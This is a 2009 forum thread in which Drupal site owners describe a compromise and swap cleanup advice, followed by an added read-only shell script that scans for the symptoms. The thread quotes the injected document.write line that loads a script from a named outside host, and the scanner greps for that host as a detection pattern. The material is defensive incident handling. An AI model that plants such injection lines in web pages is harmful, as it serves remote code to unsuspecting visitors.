Hacked

timdp - October 19, 2009 - 13:55

I think my site has been hacked (while it was 6.13) and upgrading to 6.14 hasn't solved it. (BTW, I neglected it for 3 months and so there were some module security vulnerabilities too).

The first problem is that when pages load they try to run a script from a remote site:

This is a German family-run toy shop; I have no idea what they are trying to do from my site, how they did it, or how I fix it. It did get cleaned up when I upgraded to 6.14 but now it's back.

The other problem, which might or might not be related, is that within a few hours the settings.php file and several files within the includes directory get corrupted with nonsense on the first line. If I replace them with uncorrupted copies, everything is OK for a few hours until it happens again.

Any insights appreciated.

P.S.

timdp - October 19, 2009 - 13:57

Same problem

lachmac - October 20, 2009 - 07:54

My site has also been hacked. I also run a CRM system on the same server, and this is also compromised. Some kind of iframe / JavaScript injection.

Together is better*

javascript

timdp - October 20, 2009 - 16:31

I can't find any reference to this problem anywhere else, though it's hard to believe I'm the only person on the planet with the problem. However... it seems there are many JS snippets on my installation that have the following inserted at the end:

document.write('script src=http://spielwaren-carl-loebner.de/shop/team.php \/script');
document.write('script src=http://spielwaren-carl-loebner.de/shop/team.php \/script');

(took out the tag brackets so it wouldn't be stripped)

I can reupload them from a clean copy of drupal 6.14, but pretty quickly they are corrupted again.

I am not much of a techie and I have no idea how to fix this, but I guess I'll start by changing passwords in case the offending entity is using one of them (guess I could find that out too if I spend long enough investigating).

...

sepeck - October 20, 2009 - 16:39

The source of your hack may or may not be Drupal.

So, you need to make sure you have a clean backup of your database and check your files directory. Load up a local copy on your recovery server and change your passwords, etc. Do your module updates and stuff.

Then you need to go through your server configuration. Frankly it would probably be quicker to nuke the server and rebuild it or reset it through your host.

Avoid using the same passwords.

-Steven Peck
---------
Test site, always start with a test site.
Drupal Best Practices Guide -|- Black Mountain

fixing things

timdp - October 20, 2009 - 21:50

Steven

Thanks for the suggestions, though I am afraid I can't follow all you are saying.

What I have done:

Reuploaded all the Drupal 6.14 files. I know that lots of .js files were corrupted (had the remote site name inserted) and a bunch of php files had apparent nonsense on the first line (or maybe it was code but encrypted). All of this is replaced.

Taken out some unfamiliar php files in the Files directories (called gifimg.php)

Changed the Drupal passwords to new ones that have not been used before; also changed passwords for the site login.

Backed up the database and checked to see if the offending script is in there anywhere - doesn't seem to be
Backed up all the non-Drupal files and checked them for the offending script - not there either

That's it; but there is still a reference to remote php script (at spielwaren-carl-loebner.de) written between the head and the body on every page.

I don't have a recovery server set up (yes, I see your tag line and I have read your best practices, but I haven't done it yet and I am not sure how to, though it sounds like a good idea). And I don't know what you mean by going through my server configuration--shared Linux on Lypha in my case. Lypha are pretty helpful, though there's usually about an hour for them to respond to a request.

Any further suggestions appreciated.

Tim Parker

PPS

timdp - October 20, 2009 - 22:44

Have just redone the upgrade procedure; that's cleaned it up, so now I will see if it remains clean....

Similar hack

ZakAvery - October 25, 2009 - 23:26

Oddly, I don't use drupal, but I too appear to have been hacked with the same script - a regular reader of my website thebeerboy.co.uk alerted me to it, but I've no idea how it happened, or how to prevent it.

similar hack

timdp - November 9, 2009 - 01:21

I have since been hacked in just the same way on another site I own that is hosted on Lypha -- with a script hosted on a German family toy shop site--it's hard to believe they are the culprits.

Anyhow, for both, I changed all the passwords. Lypha told me that my files were writable by anyone and they changed the permissions on the files (don't know if they are right, and anyhow, surely you'd have to log in first?). Anyhow, I changed all the passwords, made them strong ones, and all has been fine since.

P.S.

timdp - November 9, 2009 - 01:22

P.S. and of course I re-uploaded clean versions of the pages for the non-Drupal site, and reinstalled Drupal for the other.
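The thread describes four symptoms: a document.write('<script ...>') appended to .js files, a line of "nonsense" prepended to settings.php and files under includes/, unfamiliar gifimg.php files inside the files directory, and files that the host found to be writable by anyone. The script below is an added example, not code from the thread or from Drupal; it is a read-only triage scan you can run from a shell on the host (or against a downloaded copy of the site) to list everything matching those symptoms before reuploading clean files. It assumes a standard Drupal layout (PHP source in .php/.inc/.module/.install files, uploads under a directory named files), takes the site root as its argument, and uses the host name quoted in the thread as the marker to grep for; all of those are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread or from Drupal): read-only triage scan for a
# Drupal tree showing the symptoms described above. Assumptions: $1 is the Drupal
# root, uploads live under a directory named "files", and the injected script still
# references the host named in the thread. Nothing here modifies the site.

MARKER='spielwaren-carl-loebner.de'

# 1. Files that reference the remote host, or carry an appended
#    document.write('<script ...') -- the .js injection timdp saw.
scan_injected() {
    grep -rIl -e "$MARKER" -e "document.write('<script" "$1" 2>/dev/null | sort
}

# 2. PHP source files whose first line does not open with '<?php'. Drupal 6 core
#    files all start that way; a line of "nonsense" before it is the prepended
#    payload. Theme templates (*.tpl.php) that begin with raw HTML will also show
#    up here, so check each hit against a clean copy rather than deleting blindly.
scan_php_prefix() {
    find "$1" -type f \( -name '*.php' -o -name '*.inc' -o -name '*.module' \
        -o -name '*.install' \) | sort | while read -r f; do
        case "$(head -n 1 "$f")" in
            '<?php'*) ;;               # normal ('?' is quoted, so it is literal)
            *) printf '%s\n' "$f" ;;   # anything else deserves a look
        esac
    done
}

# 3. Server-side code inside the upload tree (the unfamiliar gifimg.php).
#    Uploads should never contain executable PHP.
scan_uploads() {
    find "$1" -path '*/files/*' -type f \( -name '*.php' -o -name '*.phtml' \) | sort
}

# 4. World-writable files and directories. On a shared host any other customer's
#    account, or a script running as the web server user, can rewrite these at
#    will, which fits the "clean for a few hours, then corrupted again" pattern.
scan_world_writable() {
    find "$1" -perm -002 \( -type f -o -type d \) | sort
}

# Run all four scans and label the output.
triage() {
    for name in scan_injected scan_php_prefix scan_uploads scan_world_writable; do
        printf '== %s ==\n' "$name"
        "$name" "$1"
    done
}

# Usage: sh triage.sh /path/to/drupal-root
if [ $# -gt 0 ]; then
    triage "$1"
fi
```

Once the listing is in hand, compare the hits against an untouched Drupal 6.14 tarball (for example with diff -rq between the unpacked tarball and the site) so that only files that actually differ are replaced, and fix the permissions the fourth scan reports (directories 755, files 644 is the usual shared-host baseline) before reuploading; otherwise, as the thread shows, the clean copies get overwritten again within hours.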
